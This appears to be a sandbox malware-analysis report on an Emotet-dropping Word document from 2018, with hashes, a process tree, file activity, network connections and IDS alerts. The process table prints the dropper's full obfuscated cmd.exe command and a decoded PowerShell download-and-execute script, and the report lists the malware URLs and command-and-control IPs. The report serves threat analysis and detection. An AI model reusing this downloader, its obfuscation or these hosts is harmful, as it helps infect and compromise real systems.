File name: | 083c98febf67f310ab6c42b03e20ff98902cb29df9ff1d8e522fe6f3c473ed78 |
Full analysis: | https://app.any.run/tasks/9feaa9a9-03f2-411c-83a7-88d643bb5e23 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | December 14, 2018, 09:04:49 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Dec 14 04:03:00 2018, Last Saved Time/Date: Fri Dec 14 04:03:00 2018, Number of Pages: 1, Number of Words: 4, Number of Characters: 26, Security: 0 |
MD5: | 8E7E5435909B747356B76E03C0C1EB5B |
SHA1: | A61320BAF0AC6EDAD5702660A1EC9FEA2DE42E11 |
SHA256: | 083C98FEBF67F310AB6C42B03E20FF98902CB29DF9FF1D8E522FE6F3C473ED78 |
SSDEEP: | 1536:r7ljmW9/bvF292zDL3021fJ7XdUrnYJ3Nuw/+a9:nl/bvFo2QQfJjdUrnQ9u |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | - |
---|---|
Subject: | - |
Author: | - |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2018:12:14 04:03:00 |
ModifyDate: | 2018:12:14 04:03:00 |
Pages: | 1 |
Words: | 4 |
Characters: | 26 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 29 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2948 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\083c98febf67f310ab6c42b03e20ff98902cb29df9ff1d8e522fe6f3c473ed78.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
4052 | c:\nYwjQcmSnzqz\oPirlnKKhU\rMzdQJEih\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:O/C"set AG=QtFwnzQYJacnribwCcHbmDpEAnUVF T.4shX+@S;e9/Z'}lvW(8dO-y\G{uj3gxfK$N0)=o:,Ik5&&for %I in (65,1,33,52,69,44,22,73,58,44,39,65,25,20,34,69,25,40,15,53,70,19,59,40,17,1,29,66,40,1,31,48,40,19,16,46,13,40,25,1,39,65,66,34,26,69,44,34,1,1,22,71,42,42,17,13,22,12,13,9,1,13,31,17,70,31,58,74,42,15,41,37,34,1,1,22,71,42,42,9,25,61,58,46,46,9,12,31,17,70,20,31,19,12,42,8,75,52,43,8,37,34,1,1,22,71,42,42,17,58,19,40,31,59,70,19,58,12,61,42,34,37,34,1,1,22,71,42,42,61,40,25,1,40,33,9,25,46,58,13,33,31,17,70,20,42,25,51,75,26,51,58,60,37,34,1,1,22,71,42,42,19,9,33,13,17,74,13,31,17,70,20,42,22,32,20,46,35,66,1,33,44,31,38,22,46,13,1,49,44,37,44,68,39,65,52,38,20,69,44,24,66,18,44,39,65,17,58,74,29,69,29,44,41,60,32,44,39,65,21,27,34,69,44,33,19,5,44,39,65,64,51,38,69,65,40,25,47,71,1,40,20,22,36,44,55,44,36,65,17,58,74,36,44,31,40,62,40,44,39,63,70,12,40,9,17,34,49,65,56,20,63,29,13,25,29,65,66,34,26,68,57,1,12,54,57,65,25,20,34,31,21,70,15,25,46,70,9,51,28,13,46,40,49,65,56,20,63,72,29,65,64,51,38,68,39,65,21,56,15,69,44,30,6,18,44,39,73,63,29,49,49,56,40,1,53,73,1,40,20,29,65,64,51,38,68,31,46,40,25,61,1,34,29,53,61,40,29,50,67,67,67,67,68,29,57,73,25,47,70,74,40,53,73,1,40,20,29,65,64,51,38,39,65,9,16,58,69,44,51,7,23,44,39,19,12,40,9,74,39,45,45,17,9,1,17,34,57,45,45,65,25,15,70,69,44,46,63,15,44,39,85)do set lQ6=!lQ6!!AG:~%I,1!&&if %I==85 echo !lQ6:~-421!|FOR /F "delims=.VXC46 tokens=2" %d IN ('assoc.psc1')DO %d -" | c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2612 | CmD /V:O/C"set AG=QtFwnzQYJacnribwCcHbmDpEAnUVF T.4shX+@S;e9/Z'}lvW(8dO-y\G{uj3gxfK$N0)=o:,Ik5&&for %I in (65,1,33,52,69,44,22,73,58,44,39,65,25,20,34,69,25,40,15,53,70,19,59,40,17,1,29,66,40,1,31,48,40,19,16,46,13,40,25,1,39,65,66,34,26,69,44,34,1,1,22,71,42,42,17,13,22,12,13,9,1,13,31,17,70,31,58,74,42,15,41,37,34,1,1,22,71,42,42,9,25,61,58,46,46,9,12,31,17,70,20,31,19,12,42,8,75,52,43,8,37,34,1,1,22,71,42,42,17,58,19,40,31,59,70,19,58,12,61,42,34,37,34,1,1,22,71,42,42,61,40,25,1,40,33,9,25,46,58,13,33,31,17,70,20,42,25,51,75,26,51,58,60,37,34,1,1,22,71,42,42,19,9,33,13,17,74,13,31,17,70,20,42,22,32,20,46,35,66,1,33,44,31,38,22,46,13,1,49,44,37,44,68,39,65,52,38,20,69,44,24,66,18,44,39,65,17,58,74,29,69,29,44,41,60,32,44,39,65,21,27,34,69,44,33,19,5,44,39,65,64,51,38,69,65,40,25,47,71,1,40,20,22,36,44,55,44,36,65,17,58,74,36,44,31,40,62,40,44,39,63,70,12,40,9,17,34,49,65,56,20,63,29,13,25,29,65,66,34,26,68,57,1,12,54,57,65,25,20,34,31,21,70,15,25,46,70,9,51,28,13,46,40,49,65,56,20,63,72,29,65,64,51,38,68,39,65,21,56,15,69,44,30,6,18,44,39,73,63,29,49,49,56,40,1,53,73,1,40,20,29,65,64,51,38,68,31,46,40,25,61,1,34,29,53,61,40,29,50,67,67,67,67,68,29,57,73,25,47,70,74,40,53,73,1,40,20,29,65,64,51,38,39,65,9,16,58,69,44,51,7,23,44,39,19,12,40,9,74,39,45,45,17,9,1,17,34,57,45,45,65,25,15,70,69,44,46,63,15,44,39,85)do set lQ6=!lQ6!!AG:~%I,1!&&if %I==85 echo !lQ6:~-421!|FOR /F "delims=.VXC46 tokens=2" %d IN ('assoc.psc1')DO %d -" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2700 | C:\Windows\system32\cmd.exe /S /D /c" echo $tsO='pIu';$nmh=new-object Net.WebClient;$NhU='http://cipriati.co.uk/w9@http://angullar.com.br/J5OZJ@http://cube.joburg/h@http://gentesanluis.com/nd5Udu3@http://basicki.com/p4mlXNts'.Split('@');$OSm='ANH';$cuk = '934';$DVh='sbz';$KdS=$env:temp+'\'+$cuk+'.exe';foreach($Gmf in $NhU){try{$nmh.DownloadFile($Gmf, $KdS);$DGw='TQH';If ((Get-Item $KdS).length -ge 80000) {Invoke-Item $KdS;$aCu='dYE';break;}}catch{}}$nwo='lfw';" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2768 | C:\Windows\system32\cmd.exe /S /D /c" FOR /F "delims=.VXC46 tokens=2" %d IN ('assoc.psc1') DO %d -" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3136 | C:\Windows\system32\cmd.exe /c assoc.psc1 | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3460 | PowerShell - | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2996 | "C:\Users\admin\AppData\Local\Temp\934.exe" | C:\Users\admin\AppData\Local\Temp\934.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: ODBC (3.0) driver for DBase Exit code: 0 Version: 4.0.6304.0 | ||||
3836 | "C:\Users\admin\AppData\Local\Temp\934.exe" | C:\Users\admin\AppData\Local\Temp\934.exe | 934.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: ODBC (3.0) driver for DBase Exit code: 0 Version: 4.0.6304.0 | ||||
3548 | "C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe" | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | — | 934.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: ODBC (3.0) driver for DBase Exit code: 0 Version: 4.0.6304.0 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2948 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR6A05.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2948 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C408A7CC.wmf | — | |
MD5:— | SHA256:— | |||
2948 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8EBD7BBA.wmf | — | |
MD5:— | SHA256:— | |||
3460 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FNBIBBSVWV14KM165NHL.temp | — | |
MD5:— | SHA256:— | |||
2948 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FF6E737.wmf | wmf | |
MD5:86615E1F8604036617AD3B59D748D666 | SHA256:167AF41799A5E7C3726DF24FE901C74436B265C003A146A3E98BB459B8BAAB6F | |||
3460 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:6073B6FC66D2E68644893344F6904E4A | SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3 | |||
3460 | powershell.exe | C:\Users\admin\AppData\Local\Temp\934.exe | executable | |
MD5:1DBF8DD1593C49989527543036A58CDE | SHA256:C9BA0C6EA2D8B5B9DB22F090BC926D3F2D8FCEFDAB57D49353FE05579200C1BF | |||
2948 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CA37CD5D.wmf | wmf | |
MD5:17EB758CB8C1E36D50C52287DCB802DD | SHA256:E631DB9F8CEF71028DE12EE5C000632C9A0412AD3A0143FE75EDC1C5397954CB | |||
2948 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:5E2041FDA144453159427A44F1671FF2 | SHA256:DADC67B011C595DC89FECEA682D77EFF235948180174F716411FB54E49BF309A | |||
3460 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF247976.TMP | binary | |
MD5:6073B6FC66D2E68644893344F6904E4A | SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2200 | archivesymbol.exe | GET | — | 189.154.39.153:443 | http://189.154.39.153:443/ | MX | — | — | malicious |
3460 | powershell.exe | GET | 200 | 212.227.94.120:80 | http://cipriati.co.uk/w9/ | DE | executable | 120 Kb | malicious |
2200 | archivesymbol.exe | GET | — | 186.136.68.246:80 | http://186.136.68.246/ | AR | — | — | malicious |
2200 | archivesymbol.exe | GET | — | 189.180.237.144:7080 | http://189.180.237.144:7080/ | MX | — | — | malicious |
2200 | archivesymbol.exe | GET | — | 201.111.83.186:8080 | http://201.111.83.186:8080/ | MX | — | — | malicious |
3460 | powershell.exe | GET | 301 | 212.227.94.120:80 | http://cipriati.co.uk/w9 | DE | html | 297 b | malicious |
2200 | archivesymbol.exe | GET | 200 | 86.98.66.88:990 | http://86.98.66.88:990/ | AE | binary | 132 b | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2200 | archivesymbol.exe | 186.136.68.246:80 | — | Prima S.A. | AR | malicious |
3460 | powershell.exe | 212.227.94.120:80 | cipriati.co.uk | 1&1 Internet SE | DE | suspicious |
2200 | archivesymbol.exe | 201.111.83.186:8080 | — | Uninet S.A. de C.V. | MX | malicious |
2200 | archivesymbol.exe | 189.180.237.144:7080 | — | Uninet S.A. de C.V. | MX | malicious |
2200 | archivesymbol.exe | 189.154.39.153:443 | — | Uninet S.A. de C.V. | MX | malicious |
2200 | archivesymbol.exe | 86.98.66.88:990 | — | Emirates Telecommunications Corporation | AE | suspicious |
Domain | IP | Reputation |
---|---|---|
cipriati.co.uk |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
3460 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
3460 | powershell.exe | A Network Trojan was detected | ET POLICY Terse Named Filename EXE Download - Possibly Hostile |
3460 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3460 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3460 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
2200 | archivesymbol.exe | A Network Trojan was detected | SC SPYWARE Spyware Emotet Win32 |
2200 | archivesymbol.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |
2200 | archivesymbol.exe | A Network Trojan was detected | SC SPYWARE Spyware Emotet Win32 |
2200 | archivesymbol.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |
2200 | archivesymbol.exe | A Network Trojan was detected | SC SPYWARE Spyware Emotet Win32 |